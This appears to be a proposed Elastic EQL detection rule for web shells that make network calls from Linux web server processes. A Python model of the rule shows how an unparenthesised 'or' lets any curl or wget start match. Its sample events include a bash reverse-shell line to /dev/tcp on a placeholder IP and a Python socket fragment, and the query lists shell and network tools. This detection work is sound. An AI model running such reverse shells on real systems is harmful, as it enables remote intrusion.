Description
Detects network activity initiated by web server processes that may indicate web shell execution.
Target Ruleset
linux
Target Rule Type
Custom (KQL or Lucene)
Tested ECS Version
9.2.0
Query
process where host.os.type == "linux" and event.type == "start" and
  /* Process spawned by web server */
  process.parent.name in ("apache", "apache2", "httpd", "nginx", "php-fpm", "php-cgi", "lighttpd") and
  (
    /* Reverse shell tools */
    process.name in ("bash", "sh", "dash", "zsh", "nc", "ncat", "netcat", "socat") or
    /* Network utilities */
    process.name in ("curl", "wget", "ftp", "tftp", "scp", "sftp", "ssh", "telnet") or
    (
      process.name in ("python", "python2", "python3", "perl", "ruby", "php") and
      (
        /* ":" is a case-insensitive wildcard match; without "*" it only matches an
           argument that is exactly "socket", never "import socket,subprocess;..." */
        process.args : ("*socket*", "*connect*", "*tcp*", "*http*", "*urllib*") or
        process.args in ("-c", "-e")
      )
    ) or
    /* Network scanning/enumeration */
    process.name in ("nmap", "masscan", "ping", "traceroute", "dig", "nslookup", "host")
  ) and
  /* Exclude legitimate application behaviors (loopback targets, system paths) */
  not process.args : (
    "*localhost*", "*127.0.0.1*", "::1*",
    "/usr/share/*", "/usr/lib/*"
  ) and
  /* Package-source downloads are tolerated for curl/wget only. The two
     alternatives must stay grouped: "and" binds tighter than "or" in EQL, so an
     unparenthesised "or" would let any curl/wget start on any host match the
     rule without the OS, parent-process or loopback checks. */
  (
    not process.name in ("curl", "wget") or
    not process.args : ("*github.com*", "*packagist.org*", "*wordpress.org*", "*npmjs.com*")
  )
New fields required in ECS/data sources for this rule?
No response
Related issues or PRs
No response
References
No response
Redacted Example Data
No response
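The following is an added example, not code from the issue or from the detection-rules repository. It models the rule's boolean structure in Python and runs it over constructed ECS-shaped process events, to show what the trailing curl/wget exclusion does when it is left unparenthesised (the `or` escapes the parent-process, OS and loopback checks) versus when it is grouped with `and`. The `args_match` helper approximates EQL's `:` operator (case-insensitive, `*` wildcard) with `fnmatch`; the event contents, IPs and paths are invented for the demonstration.

```python
"""Evaluate the web-shell network-activity rule over constructed ECS events.

Added example; not part of the issue or of elastic/detection-rules. The two
evaluators are a hand-written model of the EQL semantics (`in` is an exact
match against any list element, `:` is a case-insensitive wildcard match),
not Elasticsearch itself. All events below are constructed sample data.
"""
from fnmatch import fnmatchcase

WEB_SERVERS = ("apache", "apache2", "httpd", "nginx", "php-fpm", "php-cgi", "lighttpd")
SHELLS = ("bash", "sh", "dash", "zsh", "nc", "ncat", "netcat", "socat")
NET_UTILS = ("curl", "wget", "ftp", "tftp", "scp", "sftp", "ssh", "telnet")
INTERPRETERS = ("python", "python2", "python3", "perl", "ruby", "php")
SCANNERS = ("nmap", "masscan", "ping", "traceroute", "dig", "nslookup", "host")
LOCAL_OR_SYSTEM = ("*localhost*", "*127.0.0.1*", "::1*", "/usr/share/*", "/usr/lib/*")
PACKAGE_SOURCES = ("*github.com*", "*packagist.org*", "*wordpress.org*", "*npmjs.com*")
DOWNLOADERS = ("curl", "wget")


def args_match(args, patterns):
    """Model of `process.args : (...)`: any arg matches any pattern, case-insensitively.
    fnmatch's `*` and `?` behave like EQL wildcards; its `[...]` classes do not
    exist in EQL, so patterns here deliberately avoid brackets."""
    return any(fnmatchcase(a.lower(), p.lower()) for a in args for p in patterns)


def suspicious_child(ev):
    """The parenthesised block listing tools a web shell tends to spawn."""
    name, args = ev["process"]["name"], ev["process"]["args"]
    return (
        name in SHELLS
        or name in NET_UTILS
        or (name in INTERPRETERS
            and (args_match(args, ("*socket*", "*connect*", "*tcp*", "*http*", "*urllib*"))
                 or "-c" in args or "-e" in args))
        or name in SCANNERS
    )


def core(ev):
    """Everything in the query before the curl/wget clause: OS, event type,
    web-server parent, suspicious child, and the loopback/system-path exclusion."""
    p = ev["process"]
    return (
        ev["host"]["os"]["type"] == "linux"
        and ev["event"]["type"] == "start"
        and p["parent"]["name"] in WEB_SERVERS
        and suspicious_child(ev)
        and not args_match(p["args"], LOCAL_OR_SYSTEM)
    )


def is_downloader(ev):
    return ev["process"]["name"] in DOWNLOADERS


def fetches_package_source(ev):
    return args_match(ev["process"]["args"], PACKAGE_SOURCES)


def matches_as_written(ev):
    """`core and not curl/wget or (curl/wget and not package-source)`.
    `and` binds tighter than `or`, so the right-hand alternative stands alone
    and is never subject to the checks in core()."""
    return (core(ev) and not is_downloader(ev)) or (
        is_downloader(ev) and not fetches_package_source(ev))


def matches_grouped(ev):
    """Same clause in parentheses: the curl/wget exception can only narrow a
    core match, never create one."""
    return core(ev) and (not is_downloader(ev) or not fetches_package_source(ev))


def event(parent, name, args, os_type="linux"):
    """Minimal ECS-shaped process start event (constructed data)."""
    return {"host": {"os": {"type": os_type}}, "event": {"type": "start"},
            "process": {"name": name, "args": [name, *args], "parent": {"name": parent}}}


SAMPLES = {
    "reverse_shell": event("nginx", "sh", ["-c", "bash -i >& /dev/tcp/203.0.113.7/4444 0>&1"]),
    "python_reverse_shell": event("php-fpm", "python3", ["-c", "import socket,subprocess;..."]),
    "composer_fetch": event("php-fpm", "curl", ["-sS", "https://packagist.org/packages.json"]),
    "cron_curl": event("cron", "curl", ["https://example.com/healthz"]),
    "windows_wget": event("explorer.exe", "wget", ["http://example.com/"], os_type="windows"),
    "loopback_curl": event("apache2", "curl", ["http://127.0.0.1:8080/status"]),
}


def evaluate(evaluator, samples=SAMPLES):
    """Run one evaluator over every sample; returns {label: matched}."""
    return {label: evaluator(ev) for label, ev in samples.items()}


if __name__ == "__main__":
    written, grouped = evaluate(matches_as_written), evaluate(matches_grouped)
    for label in SAMPLES:
        print(f"{label:22} as written: {written[label]!s:5}  grouped: {grouped[label]}")
```

The three events that should not fire (a curl from cron, a wget on a Windows host, and a curl to the loopback status endpoint) all match the rule as written, because the unparenthesised `or` discards every preceding condition for curl and wget; with the clause grouped, only the two reverse-shell events match and the Composer fetch stays excluded.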